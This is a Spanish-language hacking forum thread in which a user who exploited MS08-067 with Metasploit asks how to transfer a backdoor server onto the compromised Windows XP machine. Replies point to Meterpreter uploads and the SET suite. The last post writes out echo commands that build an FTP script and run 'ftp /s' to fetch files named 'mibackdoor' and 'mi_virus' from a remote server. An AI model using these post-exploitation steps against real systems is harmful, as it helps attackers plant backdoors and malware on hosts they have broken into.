Sembrar server desde Shell

Iniciado por piratlax, 2 Julio 2010, 04:19 AM

0 Miembros y 1 Visitante están viendo este tema.

piratlax

hola, este es mi primer post y hasta lo pongo con un poco de culpa antes de que me digan que si no puedo buscar antes de postear, bueno sinceramente ya lo busque y e leido bastante pero no encontre algo en concreto, ahi les va mi duda:

Esto es por mi propio afan de estudiar y saber, no es para ver que tiene mi vecina ni nada de eso por el estilo, tengo varias maquinas en mi tallercillo y ejecutando nessus encontre que una de mis maquinas con XP (le puse UE10 sp3) tiene una vulnerabilidad de MS08-067, lo curioso que otra de mis maquinas le puse el xp colosus que trae el sp2 no trae esa vulnerabilidad, bueno pasando a lo otro, usando el Metasploit 3.4 use el exploit MS08_067_netapi y con payload generic reverse tcp y entre al sistema tambien me funciono con un VNC (el penultimo de la lista que dice allports), solo que entro en modo grafico y aparece una ventana azul del VNC y puedo controlarlo con mi propio mouse y teclado.

bueno la duda es esta: ya hice un server (una version modificada del Serv-u) y lo monte en un dominio, al estar en system 32 le hago el comando ftp y abre, al darle open, me conecto a mi ftp, me pide mi user, y hasta ahi llega, se me traba, lo he hecho desde la misma maquina y bajo el archivo ftp en binario, lo ejecuto y si entro a mis archivos de forma remota, pero no puedo ponerlo desde el exploit, ya intente con varios payloads y sin solucion, alguna recomendacion?

y perdon por tanto texto, pero era para que entendieran bien la situacion :p

ademas de que saludos y excelente pagina

Karcrack

Te lo muevo aqui, espero que te puedan ayudar mejor ;)

wACtOr

ami tambien se me queda colgado el FTP cuando lo ejecuto en una shell remota, no se por que la verda.

Yo utilizo una session de meterpreter para poder subir  bajar archivos, asi no tengo que trastear con el ftp.

Meterpreter es un PAYLOAD de msf. Si quieres info creo que en hacking basico o avanzado hay unos tutoriares de Shell Root.

Si algun guru tambien sabe por que se puede querar colgado el FTP ami tambien me gustaria saberlo.


Un saludo gracias.

piratlax

entonces puedo mandar mi bichito por el payload meterpreter? ahorita le busco como o si alguien me dice seria mas rapido

saludos y grax

Debci

Cita de: piratlax en  2 Julio 2010, 20:21 PM
entonces puedo mandar mi bichito por el payload meterpreter? ahorita le busco como o si alguien me dice seria mas rapido

saludos y grax
Si quieres hacerlo rapido, con la SET Suite.

Saludos

guicamper322

es por que apesar de que guindows es idiota no tanto
bueno las dos posibilidades son
a)enlugar de una shell/bin_tcp usar meterpeter ya que este prove de un comando que es upload <segido del fichero a subir>, que no necesitars ningun ftp
ahora si la cantidad de ficheros es casi mayor que mis faltas ortograficas lo mejor es la b

b) crear un fichero de texto de la siguiente manera:
ftp open direccion_ip_del_servidor
usuario
contraseña
get fichero_1
get fichero_2
get fichero_3
get fichero_4
....
close
quit


en este caso a ese fichero yo lo he llamado subir.txt
como creamos este fichero pues con el comando echo un ejemplo:

c:\windows\system32>echo ftp open 127.0.0.1 >subir.tx
c:\windows\system32>echo usuario>>subir.tx
c:\windows\system32>echo password>>subir.tx
c:\windows\system32>echo get mibackdoor>>subir.tx
c:\windows\system32>echo get mi_virus>>subir.tx

posterior mente realizamos la conexion al ftp

c:\windows\system32>ftp /s:subir.txt

bueno esto ultimo no se si era asi pero vamos que con poner ftp /help se solventa